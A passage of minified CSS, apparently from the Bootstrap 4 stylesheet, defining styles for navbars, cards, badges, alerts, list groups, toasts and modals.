space-between; padding: 0.5rem 1rem; } .navbar .container, .navbar .container-fluid, .navbar .container-sm, .navbar .container-md, .navbar .container-lg, .navbar .container-xl { display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; -ms-flex-align: center; align-items: center; -ms-flex-pack: justify; justify-content: space-between; } .navbar-brand { display: inline-block; padding-top: 0.3125rem; padding-bottom: 0.3125rem; margin-right: 1rem; font-size: 1.25rem; line-height: inherit; white-space: nowrap; } .navbar-brand:hover, .navbar-brand:focus { text-decoration: none; } .navbar-nav { display: -ms-flexbox; display: flex; -ms-flex-direction: column; flex-direction: column; padding-left: 0; margin-bottom: 0; list-style: none; } .navbar-nav .nav-link { padding-right: 0; padding-left: 0; } .navbar-nav .dropdown-menu { position: static; float: none; } .navbar-text { display: inline-block; padding-top: 0.5rem; padding-bottom: 0.5rem; } .navbar-collapse { -ms-flex-preferred-size: 100%; flex-basis: 100%; -ms-flex-positive: 1; flex-grow: 1; -ms-flex-align: center; align-items: center; } .navbar-toggler { padding: 0.25rem 0.75rem; font-size: 1.25rem; line-height: 1; background-color: transparent; border: 1px solid transparent; border-radius: 0.25rem; } .navbar-toggler:hover, .navbar-toggler:focus { text-decoration: none; } .navbar-toggler-icon { display: inline-block; width: 1.5em; height: 1.5em; vertical-align: middle; content: ""; background: no-repeat center center; background-size: 100% 100%; } @media (max-width: 575.98px) { .navbar-expand-sm > .container, .navbar-expand-sm > .container-fluid, .navbar-expand-sm > .container-sm, .navbar-expand-sm > .container-md, .navbar-expand-sm > .container-lg, .navbar-expand-sm > .container-xl { padding-right: 0; padding-left: 0; } } @media (min-width: 576px) { .navbar-expand-sm { -ms-flex-flow: row nowrap; flex-flow: row nowrap; -ms-flex-pack: start; justify-content: flex-start; } .navbar-expand-sm .navbar-nav { -ms-flex-direction: row; flex-direction: row; } .navbar-expand-sm .navbar-nav .dropdown-menu { position: absolute; } .navbar-expand-sm .navbar-nav .nav-link { padding-right: 0.5rem; padding-left: 0.5rem; } .navbar-expand-sm > .container, .navbar-expand-sm > .container-fluid, .navbar-expand-sm > .container-sm, .navbar-expand-sm > .container-md, .navbar-expand-sm > .container-lg, .navbar-expand-sm > .container-xl { -ms-flex-wrap: nowrap; flex-wrap: nowrap; } .navbar-expand-sm .navbar-collapse { display: -ms-flexbox !important; display: flex !important; -ms-flex-preferred-size: auto; flex-basis: auto; } .navbar-expand-sm .navbar-toggler { display: none; } } @media (max-width: 767.98px) { .navbar-expand-md > .container, .navbar-expand-md > .container-fluid, .navbar-expand-md > .container-sm, .navbar-expand-md > .container-md, .navbar-expand-md > .container-lg, .navbar-expand-md > .container-xl { padding-right: 0; padding-left: 0; } } @media (min-width: 768px) { .navbar-expand-md { -ms-flex-flow: row nowrap; flex-flow: row nowrap; -ms-flex-pack: start; justify-content: flex-start; } .navbar-expand-md .navbar-nav { -ms-flex-direction: row; flex-direction: row; } .navbar-expand-md .navbar-nav .dropdown-menu { position: absolute; } .navbar-expand-md .navbar-nav .nav-link { padding-right: 0.5rem; padding-left: 0.5rem; } .navbar-expand-md > .container, .navbar-expand-md > .container-fluid, .navbar-expand-md > .container-sm, .navbar-expand-md > .container-md, .navbar-expand-md > .container-lg, .navbar-expand-md > .container-xl { -ms-flex-wrap: nowrap; flex-wrap: nowrap; } .navbar-expand-md .navbar-collapse { display: -ms-flexbox !important; display: flex !important; -ms-flex-preferred-size: auto; flex-basis: auto; } .navbar-expand-md .navbar-toggler { display: none; } } @media (max-width: 991.98px) { .navbar-expand-lg > .container, .navbar-expand-lg > .container-fluid, .navbar-expand-lg > .container-sm, .navbar-expand-lg > .container-md, .navbar-expand-lg > .container-lg, .navbar-expand-lg > .container-xl { padding-right: 0; padding-left: 0; } } @media (min-width: 992px) { .navbar-expand-lg { -ms-flex-flow: row nowrap; flex-flow: row nowrap; -ms-flex-pack: start; justify-content: flex-start; } .navbar-expand-lg .navbar-nav { -ms-flex-direction: row; flex-direction: row; } .navbar-expand-lg .navbar-nav .dropdown-menu { position: absolute; } .navbar-expand-lg .navbar-nav .nav-link { padding-right: 0.5rem; padding-left: 0.5rem; } .navbar-expand-lg > .container, .navbar-expand-lg > .container-fluid, .navbar-expand-lg > .container-sm, .navbar-expand-lg > .container-md, .navbar-expand-lg > .container-lg, .navbar-expand-lg > .container-xl { -ms-flex-wrap: nowrap; flex-wrap: nowrap; } .navbar-expand-lg .navbar-collapse { display: -ms-flexbox !important; display: flex !important; -ms-flex-preferred-size: auto; flex-basis: auto; } .navbar-expand-lg .navbar-toggler { display: none; } } @media (max-width: 1199.98px) { .navbar-expand-xl > .container, .navbar-expand-xl > .container-fluid, .navbar-expand-xl > .container-sm, .navbar-expand-xl > .container-md, .navbar-expand-xl > .container-lg, .navbar-expand-xl > .container-xl { padding-right: 0; padding-left: 0; } } @media (min-width: 1200px) { .navbar-expand-xl { -ms-flex-flow: row nowrap; flex-flow: row nowrap; -ms-flex-pack: start; justify-content: flex-start; } .navbar-expand-xl .navbar-nav { -ms-flex-direction: row; flex-direction: row; } .navbar-expand-xl .navbar-nav .dropdown-menu { position: absolute; } .navbar-expand-xl .navbar-nav .nav-link { padding-right: 0.5rem; padding-left: 0.5rem; } .navbar-expand-xl > .container, .navbar-expand-xl > .container-fluid, .navbar-expand-xl > .container-sm, .navbar-expand-xl > .container-md, .navbar-expand-xl > .container-lg, .navbar-expand-xl > .container-xl { -ms-flex-wrap: nowrap; flex-wrap: nowrap; } .navbar-expand-xl .navbar-collapse { display: -ms-flexbox !important; display: flex !important; -ms-flex-preferred-size: auto; flex-basis: auto; } .navbar-expand-xl .navbar-toggler { display: none; } } .navbar-expand { -ms-flex-flow: row nowrap; flex-flow: row nowrap; -ms-flex-pack: start; justify-content: flex-start; } .navbar-expand > .container, .navbar-expand > .container-fluid, .navbar-expand > .container-sm, .navbar-expand > .container-md, .navbar-expand > .container-lg, .navbar-expand > .container-xl { padding-right: 0; padding-left: 0; } .navbar-expand .navbar-nav { -ms-flex-direction: row; flex-direction: row; } .navbar-expand .navbar-nav .dropdown-menu { position: absolute; } .navbar-expand .navbar-nav .nav-link { padding-right: 0.5rem; padding-left: 0.5rem; } .navbar-expand > .container, .navbar-expand > .container-fluid, .navbar-expand > .container-sm, .navbar-expand > .container-md, .navbar-expand > .container-lg, .navbar-expand > .container-xl { -ms-flex-wrap: nowrap; flex-wrap: nowrap; } .navbar-expand .navbar-collapse { display: -ms-flexbox !important; display: flex !important; -ms-flex-preferred-size: auto; flex-basis: auto; } .navbar-expand .navbar-toggler { display: none; } .navbar-light .navbar-brand { color: rgba(0, 0, 0, 0.9); } .navbar-light .navbar-brand:hover, .navbar-light .navbar-brand:focus { color: rgba(0, 0, 0, 0.9); } .navbar-light .navbar-nav .nav-link { color: rgba(0, 0, 0, 0.5); } .navbar-light .navbar-nav .nav-link:hover, .navbar-light .navbar-nav .nav-link:focus { color: rgba(0, 0, 0, 0.7); } .navbar-light .navbar-nav .nav-link.disabled { color: rgba(0, 0, 0, 0.3); } .navbar-light .navbar-nav .show > .nav-link, .navbar-light .navbar-nav .active > .nav-link, .navbar-light .navbar-nav .nav-link.show, .navbar-light .navbar-nav .nav-link.active { color: rgba(0, 0, 0, 0.9); } .navbar-light .navbar-toggler { color: rgba(0, 0, 0, 0.5); border-color: rgba(0, 0, 0, 0.1); } .navbar-light .navbar-toggler-icon { background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='30' height='30' viewBox='0 0 30 30'%3e%3cpath stroke='rgba(0, 0, 0, 0.5)' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e"); } .navbar-light .navbar-text { color: rgba(0, 0, 0, 0.5); } .navbar-light .navbar-text a { color: rgba(0, 0, 0, 0.9); } .navbar-light .navbar-text a:hover, .navbar-light .navbar-text a:focus { color: rgba(0, 0, 0, 0.9); } .navbar-dark .navbar-brand { color: #fff; } .navbar-dark .navbar-brand:hover, .navbar-dark .navbar-brand:focus { color: #fff; } .navbar-dark .navbar-nav .nav-link { color: rgba(255, 255, 255, 0.5); } .navbar-dark .navbar-nav .nav-link:hover, .navbar-dark .navbar-nav .nav-link:focus { color: rgba(255, 255, 255, 0.75); } .navbar-dark .navbar-nav .nav-link.disabled { color: rgba(255, 255, 255, 0.25); } .navbar-dark .navbar-nav .show > .nav-link, .navbar-dark .navbar-nav .active > .nav-link, .navbar-dark .navbar-nav .nav-link.show, .navbar-dark .navbar-nav .nav-link.active { color: #fff; } .navbar-dark .navbar-toggler { color: rgba(255, 255, 255, 0.5); border-color: rgba(255, 255, 255, 0.1); } .navbar-dark .navbar-toggler-icon { background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='30' height='30' viewBox='0 0 30 30'%3e%3cpath stroke='rgba(255, 255, 255, 0.5)' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e"); } .navbar-dark .navbar-text { color: rgba(255, 255, 255, 0.5); } .navbar-dark .navbar-text a { color: #fff; } .navbar-dark .navbar-text a:hover, .navbar-dark .navbar-text a:focus { color: #fff; } .card { position: relative; display: -ms-flexbox; display: flex; -ms-flex-direction: column; flex-direction: column; min-width: 0; word-wrap: break-word; background-color: #fff; background-clip: border-box; border: 1px solid rgba(0, 0, 0, 0.125); border-radius: 0.25rem; } .card > hr { margin-right: 0; margin-left: 0; } .card > .list-group:first-child .list-group-item:first-child { border-top-left-radius: 0.25rem; border-top-right-radius: 0.25rem; } .card > .list-group:last-child .list-group-item:last-child { border-bottom-right-radius: 0.25rem; border-bottom-left-radius: 0.25rem; } .card-body { -ms-flex: 1 1 auto; flex: 1 1 auto; min-height: 1px; padding: 1.25rem; } .card-title { margin-bottom: 0.75rem; } .card-subtitle { margin-top: -0.375rem; margin-bottom: 0; } .card-text:last-child { margin-bottom: 0; } .card-link:hover { text-decoration: none; } .card-link + .card-link { margin-left: 1.25rem; } .card-header { padding: 0.75rem 1.25rem; margin-bottom: 0; background-color: rgba(0, 0, 0, 0.03); border-bottom: 1px solid rgba(0, 0, 0, 0.125); } .card-header:first-child { border-radius: calc(0.25rem - 1px) calc(0.25rem - 1px) 0 0; } .card-header + .list-group .list-group-item:first-child { border-top: 0; } .card-footer { padding: 0.75rem 1.25rem; background-color: rgba(0, 0, 0, 0.03); border-top: 1px solid rgba(0, 0, 0, 0.125); } .card-footer:last-child { border-radius: 0 0 calc(0.25rem - 1px) calc(0.25rem - 1px); } .card-header-tabs { margin-right: -0.625rem; margin-bottom: -0.75rem; margin-left: -0.625rem; border-bottom: 0; } .card-header-pills { margin-right: -0.625rem; margin-left: -0.625rem; } .card-img-overlay { position: absolute; top: 0; right: 0; bottom: 0; left: 0; padding: 1.25rem; } .card-img, .card-img-top, .card-img-bottom { -ms-flex-negative: 0; flex-shrink: 0; width: 100%; } .card-img, .card-img-top { border-top-left-radius: calc(0.25rem - 1px); border-top-right-radius: calc(0.25rem - 1px); } .card-img, .card-img-bottom { border-bottom-right-radius: calc(0.25rem - 1px); border-bottom-left-radius: calc(0.25rem - 1px); } .card-deck .card { margin-bottom: 15px; } @media (min-width: 576px) { .card-deck { display: -ms-flexbox; display: flex; -ms-flex-flow: row wrap; flex-flow: row wrap; margin-right: -15px; margin-left: -15px; } .card-deck .card { -ms-flex: 1 0 0%; flex: 1 0 0%; margin-right: 15px; margin-bottom: 0; margin-left: 15px; } } .card-group > .card { margin-bottom: 15px; } @media (min-width: 576px) { .card-group { display: -ms-flexbox; display: flex; -ms-flex-flow: row wrap; flex-flow: row wrap; } .card-group > .card { -ms-flex: 1 0 0%; flex: 1 0 0%; margin-bottom: 0; } .card-group > .card + .card { margin-left: 0; border-left: 0; } .card-group > .card:not(:last-child) { border-top-right-radius: 0; border-bottom-right-radius: 0; } .card-group > .card:not(:last-child) .card-img-top, .card-group > .card:not(:last-child) .card-header { border-top-right-radius: 0; } .card-group > .card:not(:last-child) .card-img-bottom, .card-group > .card:not(:last-child) .card-footer { border-bottom-right-radius: 0; } .card-group > .card:not(:first-child) { border-top-left-radius: 0; border-bottom-left-radius: 0; } .card-group > .card:not(:first-child) .card-img-top, .card-group > .card:not(:first-child) .card-header { border-top-left-radius: 0; } .card-group > .card:not(:first-child) .card-img-bottom, .card-group > .card:not(:first-child) .card-footer { border-bottom-left-radius: 0; } } .card-columns .card { margin-bottom: 0.75rem; } @media (min-width: 576px) { .card-columns { -webkit-column-count: 3; -moz-column-count: 3; column-count: 3; -webkit-column-gap: 1.25rem; -moz-column-gap: 1.25rem; column-gap: 1.25rem; orphans: 1; widows: 1; } .card-columns .card { display: inline-block; width: 100%; } } .accordion > .card { overflow: hidden; } .accordion > .card:not(:last-of-type) { border-bottom: 0; border-bottom-right-radius: 0; border-bottom-left-radius: 0; } .accordion > .card:not(:first-of-type) { border-top-left-radius: 0; border-top-right-radius: 0; } .accordion > .card > .card-header { border-radius: 0; margin-bottom: -1px; } .breadcrumb { display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; padding: 0.75rem 1rem; margin-bottom: 1rem; list-style: none; background-color: #e9ecef; border-radius: 0.25rem; } .breadcrumb-item + .breadcrumb-item { padding-left: 0.5rem; } .breadcrumb-item + .breadcrumb-item::before { display: inline-block; padding-right: 0.5rem; color: #6c757d; content: "/"; } .breadcrumb-item + .breadcrumb-item:hover::before { text-decoration: underline; } .breadcrumb-item + .breadcrumb-item:hover::before { text-decoration: none; } .breadcrumb-item.active { color: #6c757d; } .pagination { display: -ms-flexbox; display: flex; padding-left: 0; list-style: none; border-radius: 0.25rem; } .page-link { position: relative; display: block; padding: 0.5rem 0.75rem; margin-left: -1px; line-height: 1.25; color: #007bff; background-color: #fff; border: 1px solid #dee2e6; } .page-link:hover { z-index: 2; color: #0056b3; text-decoration: none; background-color: #e9ecef; border-color: #dee2e6; } .page-link:focus { z-index: 3; outline: 0; box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.25); } .page-item:first-child .page-link { margin-left: 0; border-top-left-radius: 0.25rem; border-bottom-left-radius: 0.25rem; } .page-item:last-child .page-link { border-top-right-radius: 0.25rem; border-bottom-right-radius: 0.25rem; } .page-item.active .page-link { z-index: 3; color: #fff; background-color: #007bff; border-color: #007bff; } .page-item.disabled .page-link { color: #6c757d; pointer-events: none; cursor: auto; background-color: #fff; border-color: #dee2e6; } .pagination-lg .page-link { padding: 0.75rem 1.5rem; font-size: 1.25rem; line-height: 1.5; } .pagination-lg .page-item:first-child .page-link { border-top-left-radius: 0.3rem; border-bottom-left-radius: 0.3rem; } .pagination-lg .page-item:last-child .page-link { border-top-right-radius: 0.3rem; border-bottom-right-radius: 0.3rem; } .pagination-sm .page-link { padding: 0.25rem 0.5rem; font-size: 0.875rem; line-height: 1.5; } .pagination-sm .page-item:first-child .page-link { border-top-left-radius: 0.2rem; border-bottom-left-radius: 0.2rem; } .pagination-sm .page-item:last-child .page-link { border-top-right-radius: 0.2rem; border-bottom-right-radius: 0.2rem; } .badge { display: inline-block; padding: 0.25em 0.4em; font-size: 75%; font-weight: 700; line-height: 1; text-align: center; white-space: nowrap; vertical-align: baseline; border-radius: 0.25rem; transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out; } @media (prefers-reduced-motion: reduce) { .badge { transition: none; } } a.badge:hover, a.badge:focus { text-decoration: none; } .badge:empty { display: none; } .btn .badge { position: relative; top: -1px; } .badge-pill { padding-right: 0.6em; padding-left: 0.6em; border-radius: 10rem; } .badge-primary { color: #fff; background-color: #007bff; } a.badge-primary:hover, a.badge-primary:focus { color: #fff; background-color: #0062cc; } a.badge-primary:focus, a.badge-primary.focus { outline: 0; box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.5); } .badge-secondary { color: #fff; background-color: #6c757d; } a.badge-secondary:hover, a.badge-secondary:focus { color: #fff; background-color: #545b62; } a.badge-secondary:focus, a.badge-secondary.focus { outline: 0; box-shadow: 0 0 0 0.2rem rgba(108, 117, 125, 0.5); } .badge-success { color: #fff; background-color: #28a745; } a.badge-success:hover, a.badge-success:focus { color: #fff; background-color: #1e7e34; } a.badge-success:focus, a.badge-success.focus { outline: 0; box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.5); } .badge-info { color: #fff; background-color: #17a2b8; } a.badge-info:hover, a.badge-info:focus { color: #fff; background-color: #117a8b; } a.badge-info:focus, a.badge-info.focus { outline: 0; box-shadow: 0 0 0 0.2rem rgba(23, 162, 184, 0.5); } .badge-warning { color: #212529; background-color: #ffc107; } a.badge-warning:hover, a.badge-warning:focus { color: #212529; background-color: #d39e00; } a.badge-warning:focus, a.badge-warning.focus { outline: 0; box-shadow: 0 0 0 0.2rem rgba(255, 193, 7, 0.5); } .badge-danger { color: #fff; background-color: #dc3545; } a.badge-danger:hover, a.badge-danger:focus { color: #fff; background-color: #bd2130; } a.badge-danger:focus, a.badge-danger.focus { outline: 0; box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.5); } .badge-light { color: #212529; background-color: #f8f9fa; } a.badge-light:hover, a.badge-light:focus { color: #212529; background-color: #dae0e5; } a.badge-light:focus, a.badge-light.focus { outline: 0; box-shadow: 0 0 0 0.2rem rgba(248, 249, 250, 0.5); } .badge-dark { color: #fff; background-color: #343a40; } a.badge-dark:hover, a.badge-dark:focus { color: #fff; background-color: #1d2124; } a.badge-dark:focus, a.badge-dark.focus { outline: 0; box-shadow: 0 0 0 0.2rem rgba(52, 58, 64, 0.5); } .jumbotron { padding: 2rem 1rem; margin-bottom: 2rem; background-color: #e9ecef; border-radius: 0.3rem; } @media (min-width: 576px) { .jumbotron { padding: 4rem 2rem; } } .jumbotron-fluid { padding-right: 0; padding-left: 0; border-radius: 0; } .alert { position: relative; padding: 0.75rem 1.25rem; margin-bottom: 1rem; border: 1px solid transparent; border-radius: 0.25rem; } .alert-heading { color: inherit; } .alert-link { font-weight: 700; } .alert-dismissible { padding-right: 4rem; } .alert-dismissible .close { position: absolute; top: 0; right: 0; padding: 0.75rem 1.25rem; color: inherit; } .alert-primary { color: #004085; background-color: #cce5ff; border-color: #b8daff; } .alert-primary hr { border-top-color: #9fcdff; } .alert-primary .alert-link { color: #002752; } .alert-secondary { color: #383d41; background-color: #e2e3e5; border-color: #d6d8db; } .alert-secondary hr { border-top-color: #c8cbcf; } .alert-secondary .alert-link { color: #202326; } .alert-success { color: #155724; background-color: #d4edda; border-color: #c3e6cb; } .alert-success hr { border-top-color: #b1dfbb; } .alert-success .alert-link { color: #0b2e13; } .alert-info { color: #0c5460; background-color: #d1ecf1; border-color: #bee5eb; } .alert-info hr { border-top-color: #abdde5; } .alert-info .alert-link { color: #062c33; } .alert-warning { color: #856404; background-color: #fff3cd; border-color: #ffeeba; } .alert-warning hr { border-top-color: #ffe8a1; } .alert-warning .alert-link { color: #533f03; } .alert-danger { color: #721c24; background-color: #f8d7da; border-color: #f5c6cb; } .alert-danger hr { border-top-color: #f1b0b7; } .alert-danger .alert-link { color: #491217; } .alert-light { color: #818182; background-color: #fefefe; border-color: #fdfdfe; } .alert-light hr { border-top-color: #ececf6; } .alert-light .alert-link { color: #686868; } .alert-dark { color: #1b1e21; background-color: #d6d8d9; border-color: #c6c8ca; } .alert-dark hr { border-top-color: #b9bbbe; } .alert-dark .alert-link { color: #040505; } @-webkit-keyframes progress-bar-stripes { from { background-position: 1rem 0; } to { background-position: 0 0; } } @keyframes progress-bar-stripes { from { background-position: 1rem 0; } to { background-position: 0 0; } } .progress { display: -ms-flexbox; display: flex; height: 1rem; overflow: hidden; font-size: 0.75rem; background-color: #e9ecef; border-radius: 0.25rem; } .progress-bar { display: -ms-flexbox; display: flex; -ms-flex-direction: column; flex-direction: column; -ms-flex-pack: center; justify-content: center; overflow: hidden; color: #fff; text-align: center; white-space: nowrap; background-color: #007bff; transition: width 0.6s ease; } @media (prefers-reduced-motion: reduce) { .progress-bar { transition: none; } } .progress-bar-striped { background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-size: 1rem 1rem; } .progress-bar-animated { -webkit-animation: progress-bar-stripes 1s linear infinite; animation: progress-bar-stripes 1s linear infinite; } @media (prefers-reduced-motion: reduce) { .progress-bar-animated { -webkit-animation: none; animation: none; } } .media { display: -ms-flexbox; display: flex; -ms-flex-align: start; align-items: flex-start; } .media-body { -ms-flex: 1; flex: 1; } .list-group { display: -ms-flexbox; display: flex; -ms-flex-direction: column; flex-direction: column; padding-left: 0; margin-bottom: 0; } .list-group-item-action { width: 100%; color: #495057; text-align: inherit; } .list-group-item-action:hover, .list-group-item-action:focus { z-index: 1; color: #495057; text-decoration: none; background-color: #f8f9fa; } .list-group-item-action:active { color: #212529; background-color: #e9ecef; } .list-group-item { position: relative; display: block; padding: 0.75rem 1.25rem; background-color: #fff; border: 1px solid rgba(0, 0, 0, 0.125); } .list-group-item:first-child { border-top-left-radius: 0.25rem; border-top-right-radius: 0.25rem; } .list-group-item:last-child { border-bottom-right-radius: 0.25rem; border-bottom-left-radius: 0.25rem; } .list-group-item.disabled, .list-group-item:disabled { color: #6c757d; pointer-events: none; background-color: #fff; } .list-group-item.active { z-index: 2; color: #fff; background-color: #007bff; border-color: #007bff; } .list-group-item + .list-group-item { border-top-width: 0; } .list-group-item + .list-group-item.active { margin-top: -1px; border-top-width: 1px; } .list-group-horizontal { -ms-flex-direction: row; flex-direction: row; } .list-group-horizontal .list-group-item:first-child { border-bottom-left-radius: 0.25rem; border-top-right-radius: 0; } .list-group-horizontal .list-group-item:last-child { border-top-right-radius: 0.25rem; border-bottom-left-radius: 0; } .list-group-horizontal .list-group-item.active { margin-top: 0; } .list-group-horizontal .list-group-item + .list-group-item { border-top-width: 1px; border-left-width: 0; } .list-group-horizontal .list-group-item + .list-group-item.active { margin-left: -1px; border-left-width: 1px; } @media (min-width: 576px) { .list-group-horizontal-sm { -ms-flex-direction: row; flex-direction: row; } .list-group-horizontal-sm .list-group-item:first-child { border-bottom-left-radius: 0.25rem; border-top-right-radius: 0; } .list-group-horizontal-sm .list-group-item:last-child { border-top-right-radius: 0.25rem; border-bottom-left-radius: 0; } .list-group-horizontal-sm .list-group-item.active { margin-top: 0; } .list-group-horizontal-sm .list-group-item + .list-group-item { border-top-width: 1px; border-left-width: 0; } .list-group-horizontal-sm .list-group-item + .list-group-item.active { margin-left: -1px; border-left-width: 1px; } } @media (min-width: 768px) { .list-group-horizontal-md { -ms-flex-direction: row; flex-direction: row; } .list-group-horizontal-md .list-group-item:first-child { border-bottom-left-radius: 0.25rem; border-top-right-radius: 0; } .list-group-horizontal-md .list-group-item:last-child { border-top-right-radius: 0.25rem; border-bottom-left-radius: 0; } .list-group-horizontal-md .list-group-item.active { margin-top: 0; } .list-group-horizontal-md .list-group-item + .list-group-item { border-top-width: 1px; border-left-width: 0; } .list-group-horizontal-md .list-group-item + .list-group-item.active { margin-left: -1px; border-left-width: 1px; } } @media (min-width: 992px) { .list-group-horizontal-lg { -ms-flex-direction: row; flex-direction: row; } .list-group-horizontal-lg .list-group-item:first-child { border-bottom-left-radius: 0.25rem; border-top-right-radius: 0; } .list-group-horizontal-lg .list-group-item:last-child { border-top-right-radius: 0.25rem; border-bottom-left-radius: 0; } .list-group-horizontal-lg .list-group-item.active { margin-top: 0; } .list-group-horizontal-lg .list-group-item + .list-group-item { border-top-width: 1px; border-left-width: 0; } .list-group-horizontal-lg .list-group-item + .list-group-item.active { margin-left: -1px; border-left-width: 1px; } } @media (min-width: 1200px) { .list-group-horizontal-xl { -ms-flex-direction: row; flex-direction: row; } .list-group-horizontal-xl .list-group-item:first-child { border-bottom-left-radius: 0.25rem; border-top-right-radius: 0; } .list-group-horizontal-xl .list-group-item:last-child { border-top-right-radius: 0.25rem; border-bottom-left-radius: 0; } .list-group-horizontal-xl .list-group-item.active { margin-top: 0; } .list-group-horizontal-xl .list-group-item + .list-group-item { border-top-width: 1px; border-left-width: 0; } .list-group-horizontal-xl .list-group-item + .list-group-item.active { margin-left: -1px; border-left-width: 1px; } } .list-group-flush .list-group-item { border-right-width: 0; border-left-width: 0; border-radius: 0; } .list-group-flush .list-group-item:first-child { border-top-width: 0; } .list-group-flush:last-child .list-group-item:last-child { border-bottom-width: 0; } .list-group-item-primary { color: #004085; background-color: #b8daff; } .list-group-item-primary.list-group-item-action:hover, .list-group-item-primary.list-group-item-action:focus { color: #004085; background-color: #9fcdff; } .list-group-item-primary.list-group-item-action.active { color: #fff; background-color: #004085; border-color: #004085; } .list-group-item-secondary { color: #383d41; background-color: #d6d8db; } .list-group-item-secondary.list-group-item-action:hover, .list-group-item-secondary.list-group-item-action:focus { color: #383d41; background-color: #c8cbcf; } .list-group-item-secondary.list-group-item-action.active { color: #fff; background-color: #383d41; border-color: #383d41; } .list-group-item-success { color: #155724; background-color: #c3e6cb; } .list-group-item-success.list-group-item-action:hover, .list-group-item-success.list-group-item-action:focus { color: #155724; background-color: #b1dfbb; } .list-group-item-success.list-group-item-action.active { color: #fff; background-color: #155724; border-color: #155724; } .list-group-item-info { color: #0c5460; background-color: #bee5eb; } .list-group-item-info.list-group-item-action:hover, .list-group-item-info.list-group-item-action:focus { color: #0c5460; background-color: #abdde5; } .list-group-item-info.list-group-item-action.active { color: #fff; background-color: #0c5460; border-color: #0c5460; } .list-group-item-warning { color: #856404; background-color: #ffeeba; } .list-group-item-warning.list-group-item-action:hover, .list-group-item-warning.list-group-item-action:focus { color: #856404; background-color: #ffe8a1; } .list-group-item-warning.list-group-item-action.active { color: #fff; background-color: #856404; border-color: #856404; } .list-group-item-danger { color: #721c24; background-color: #f5c6cb; } .list-group-item-danger.list-group-item-action:hover, .list-group-item-danger.list-group-item-action:focus { color: #721c24; background-color: #f1b0b7; } .list-group-item-danger.list-group-item-action.active { color: #fff; background-color: #721c24; border-color: #721c24; } .list-group-item-light { color: #818182; background-color: #fdfdfe; } .list-group-item-light.list-group-item-action:hover, .list-group-item-light.list-group-item-action:focus { color: #818182; background-color: #ececf6; } .list-group-item-light.list-group-item-action.active { color: #fff; background-color: #818182; border-color: #818182; } .list-group-item-dark { color: #1b1e21; background-color: #c6c8ca; } .list-group-item-dark.list-group-item-action:hover, .list-group-item-dark.list-group-item-action:focus { color: #1b1e21; background-color: #b9bbbe; } .list-group-item-dark.list-group-item-action.active { color: #fff; background-color: #1b1e21; border-color: #1b1e21; } .close { float: right; font-size: 1.5rem; font-weight: 700; line-height: 1; color: #000; text-shadow: 0 1px 0 #fff; opacity: .5; } .close:hover { color: #000; text-decoration: none; } .close:not(:disabled):not(.disabled):hover, .close:not(:disabled):not(.disabled):focus { opacity: .75; } button.close { padding: 0; background-color: transparent; border: 0; -webkit-appearance: none; -moz-appearance: none; appearance: none; } a.close.disabled { pointer-events: none; } .toast { max-width: 350px; overflow: hidden; font-size: 0.875rem; background-color: rgba(255, 255, 255, 0.85); background-clip: padding-box; border: 1px solid rgba(0, 0, 0, 0.1); box-shadow: 0 0.25rem 0.75rem rgba(0, 0, 0, 0.1); -webkit-backdrop-filter: blur(10px); backdrop-filter: blur(10px); opacity: 0; border-radius: 0.25rem; } .toast:not(:last-child) { margin-bottom: 0.75rem; } .toast.showing { opacity: 1; } .toast.show { display: block; opacity: 1; } .toast.hide { display: none; } .toast-header { display: -ms-flexbox; display: flex; -ms-flex-align: center; align-items: center; padding: 0.25rem 0.75rem; color: #6c757d; background-color: rgba(255, 255, 255, 0.85); background-clip: padding-box; border-bottom: 1px solid rgba(0, 0, 0, 0.05); } .toast-body { padding: 0.75rem; } .modal-open { overflow: hidden; } .modal-open .modal { overflow-x: hidden; overflow-y: auto; } .modal { position: fixed; top: 0; left: 0; z-index: 1050; display: none; width: 100%; height: 100%; overflow: hidden; outline: 0; } .modal-dialog { position: relative; width: auto; margin: 0.5rem; pointer-events: none; } .modal.fade .modal-dialog { transition: -webkit-transform 0.3s ease-out; transition: transform 0.3s ease-out; transition: transform 0.3s ease-out, -webkit-transform 0.3s ease-out; -webkit-transform: translate(0, -50px); transform: translate(0, -50px); } @media (prefers-reduced-motion: reduce) { .modal.fade .modal-dialog { transition: none; } } .modal.show .modal-dialog { -webkit-transform: none; transform: none; } .modal.modal-static .modal-dialog { -webkit-transform: scale(1.02); transform: scale(1.02); } .modal-dialog-scrollable { display: -ms-flexbox; display: flex; max-height: calc(100% - 1rem); } .modal-dialog-scrollable .modal-content { max-height: calc(100vh - 1rem); overflow: hidden; } .modal-dialog-scrollable .modal-header, .modal-dialog-scrollable .modal-footer { -ms-flex-negative: 0; flex-shrink: 0; } .modal-dialog-scrollable .modal-body { overflow-y: auto; } .modal-dialog-centered { display: -ms-flexbox; display: flex; -ms-flex-align: center; align-items: center; min-height: calc(100% - 1rem); } .modal-dialog-centered::before { display: block; height: calc(100vh - 1rem); content: ""; } .modal-dialog-centered.modal-dialog-scrollable { -ms-flex-direction: column; flex-direction: column; -ms-flex-pack: center; justify-content: center; height: 100%; } .modal-dialog-centered.modal-dialog-scrollable .modal-content { max-height: none; } .modal-dialog-centered.modal-dialog-scrollable::before { content: none; } .modal-content { position: relative; display: -ms-flexbox; display: flex; -ms-flex-direction: column; flex-direction: column; width: 100%; pointer-events: auto; background-color: #fff; background-clip: padding-box; border: 1px solid rgba(0, 0, 0, 0.2); border-radius: 0.3rem; outline: 0; } .modal-backdrop { position: fixed; top: 0; left: 0; z-index: 1040; width: 100vw; height: 100vh; background-color: #000; } .modal-backdrop.fade { opacity: 0; } 